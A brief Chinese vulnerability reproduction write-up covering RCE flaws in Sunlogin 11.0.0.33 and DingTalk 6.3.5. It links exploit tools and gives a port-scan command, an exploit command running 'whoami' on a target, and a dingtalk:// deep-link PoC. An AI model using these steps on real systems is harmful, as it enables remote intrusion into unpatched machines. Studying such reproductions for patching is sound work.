向日葵&钉钉 RCE漏洞复现
前言:
目前最新版漏洞均已经修复
注: 该请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与本人无关
1. 向日葵RCE漏洞
CNVD编号:CNVD-2022-10270
漏洞影响版本: 11.0.0.33
工具Github地址:https://github.com/Mr-xn/sunlogin_rce
golang命令:
编译: go build main.go
使用go get安装github依赖不成功的解决方法
go env -w GO111MODULE=on
go env -w GOPROXY=https://goproxy.io,direct
复现:
用工具扫描向日葵存在的端口号
xrkRce.exe -h ip -t scan -p 1-65535
执行exp
xrkRce.exe -h ip -t rce -p port -c "whoami"
2. 钉钉RCE漏洞
漏洞影响版本: Dingtalk 6.3.5
工具Github地址:https://github.com/crazy0x70/dingtalk-RCE
复现:
本地复现,所以将test.html放在phpstudy的目录下并启动,发送并点击
poc: dingtalk://dingtalkclient/page/link?url=127.0.0.1/test.html&pc_slide=true
修复方案
官方已经修复漏洞,请尽快升级最新版本